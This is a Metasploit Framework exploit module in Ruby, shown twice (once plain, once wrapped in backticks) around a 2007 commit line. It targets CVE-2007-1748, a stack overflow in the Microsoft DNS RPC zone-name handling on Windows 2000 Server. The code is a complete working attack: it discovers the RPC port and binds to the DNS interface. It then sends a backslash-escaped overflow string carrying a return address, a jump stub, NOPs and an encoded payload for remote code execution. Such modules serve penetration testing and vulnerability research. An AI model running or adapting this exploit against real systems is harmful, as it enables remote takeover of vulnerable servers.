metasploit-framework/modules/exploits/windows/dcerpc/msdns_zonename.rb

##
# $Id: ms05_017_msmq.rb 4502 2007-03-06 13:29:17Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remote

	include Exploit::Remote::DCERPC
	include Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft DNS RPC extractQuotedChar() Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the RPC interface
				of the Microsoft DNS service. The vulnerability is triggered
				when a long zone name parameter is supplied that contains 
				backslash characters. 
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 4502 $',
			'References'     =>
				[
					['CVE', '2007-1748'],
					['URL', 'http://www.microsoft.com/technet/security/advisory/935964.mspx']
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					
					# The payload doesn't matter, but make_nops() uses these too
					'BadChars' => "\x00\x5c\x5f\x31\x32\x33\x34\x35\x36\x37",
					
					'StackAdjustment' => -3500,

				},
			'SaveRegisters'  => [ 'esp', 'edi' ],
			'Targets'        => 
				[
					# 0x31 - 0x37 are converted to 0x01 - 0x07 
					[
						'Windows 2000 Server SP0-SP4+ English',
						{
							'Platform' => 'win',
							'Ret'      => 0x750219d6 # jmp ebx in ws2help.dll,
						},
					],
				],
			'DisclosureDate' => 'Apr 13 2007',
			'DefaultTarget' => 0))
		
		register_options(
			[
				Opt::RPORT(0)
			], self.class)
	end
	
	def exploit

		dport = datastore['RPORT'].to_i
		if (dport == 0)
			
			dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp')
			
			if (not dport)
				print_status("Could not determine the RPC port used by the Microsoft DNS Server")
				return
			end
			
			print_status("Discovered Microsoft DNS Server RPC service on port #{dport}")
		end

		connect(true, { 'RPORT' => dport })
		print_status("Trying target #{target.name}...")
		
		handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		jumper =
			"\x81\xef" + [-0x0604].pack("V") +
			"\xff\xd7"

		txt = Rex::Text.pattern_create(480)
		txt << make_nops(160)
		txt << jumper
		
		txt[465, 4] = [target.ret].pack("V")
		
		req = ''
		txt.each_byte do |c|
			req << "\\"
			req << c
		end
		
		stubdata =
			NDR.long(rand(0xffffffff)) +
			NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") +
			
			NDR.long(rand(0xffffffff)) +
			NDR.string(req + "\x00") +
			
			NDR.long(rand(0xffffffff)) +
			NDR.string(Rex::Text.rand_text_alpha(1) + "\x00")
		
		stubdata << make_nops(512) + payload.encoded
		
		print_status('Sending exploit ...')
	
		begin
			response = dcerpc.call(1, stubdata)

			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
				print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
			end
		rescue ::Exception => e
			print_status("Error: #{e}")
		end
		
		handler
		disconnect
	end

end
end
Adding the Microsoft DNS service exploit, targetting Windows 2000 git-svn-id: file:///home/svn/framework3/trunk@4677 4d416f70-5f16-0410-b530-b9f4589650da 2007-04-14 07:16:33 +00:00			`##`
			`# $Id: ms05_017_msmq.rb 4502 2007-03-06 13:29:17Z hdm $`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/projects/Framework/`
			`##`


			`require 'msf/core'`

			`module Msf`

			`class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remote`

			`include Exploit::Remote::DCERPC`
			`include Exploit::Remote::Seh`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Microsoft DNS RPC extractQuotedChar() Overflow',`
			`'Description' => %q{`
			`This module exploits a stack overflow in the RPC interface`
			`of the Microsoft DNS service. The vulnerability is triggered`
			`when a long zone name parameter is supplied that contains`
			`backslash characters.`
			`},`
			`'Author' => [ 'hdm' ],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision: 4502 $',`
			`'References' =>`
			`[`
			`['CVE', '2007-1748'],`
			`['URL', 'http://www.microsoft.com/technet/security/advisory/935964.mspx']`
			`],`
			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`'Space' => 1024,`

			`# The payload doesn't matter, but make_nops() uses these too`
			`'BadChars' => "\x00\x5c\x5f\x31\x32\x33\x34\x35\x36\x37",`

			`'StackAdjustment' => -3500,`

			`},`
			`'SaveRegisters' => [ 'esp', 'edi' ],`
			`'Targets' =>`
			`[`
			`# 0x31 - 0x37 are converted to 0x01 - 0x07`
			`[`
			`'Windows 2000 Server SP0-SP4+ English',`
			`{`
			`'Platform' => 'win',`
			`'Ret' => 0x750219d6 # jmp ebx in ws2help.dll,`
			`},`
			`],`
			`],`
			`'DisclosureDate' => 'Apr 13 2007',`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`Opt::RPORT(0)`
			`], self.class)`
			`end`

			`def exploit`

			`dport = datastore['RPORT'].to_i`
			`if (dport == 0)`

			`dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp')`

			`if (not dport)`
			`print_status("Could not determine the RPC port used by the Microsoft DNS Server")`
			`return`
			`end`

			`print_status("Discovered Microsoft DNS Server RPC service on port #{dport}")`
			`end`

			`connect(true, { 'RPORT' => dport })`
			`print_status("Trying target #{target.name}...")`

			`handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']])`
			`print_status("Binding to #{handle} ...")`
			`dcerpc_bind(handle)`
			`print_status("Bound to #{handle} ...")`

			`jumper =`
			`"\x81\xef" + [-0x0604].pack("V") +`
			`"\xff\xd7"`

			`txt = Rex::Text.pattern_create(480)`
			`txt << make_nops(160)`
			`txt << jumper`

			`txt[465, 4] = [target.ret].pack("V")`

			`req = ''`
			`txt.each_byte do \|c\|`
			`req << "\\"`
			`req << c`
			`end`

			`stubdata =`
			`NDR.long(rand(0xffffffff)) +`
			`NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") +`

			`NDR.long(rand(0xffffffff)) +`
			`NDR.string(req + "\x00") +`

			`NDR.long(rand(0xffffffff)) +`
			`NDR.string(Rex::Text.rand_text_alpha(1) + "\x00")`

			`stubdata << make_nops(512) + payload.encoded`

			`print_status('Sending exploit ...')`

			`begin`
			`response = dcerpc.call(1, stubdata)`

			`if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)`
			`print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])`
			`end`
			`rescue ::Exception => e`
			`print_status("Error: #{e}")`
			`end`

			`handler`
			`disconnect`
			`end`

			`end`
			`end`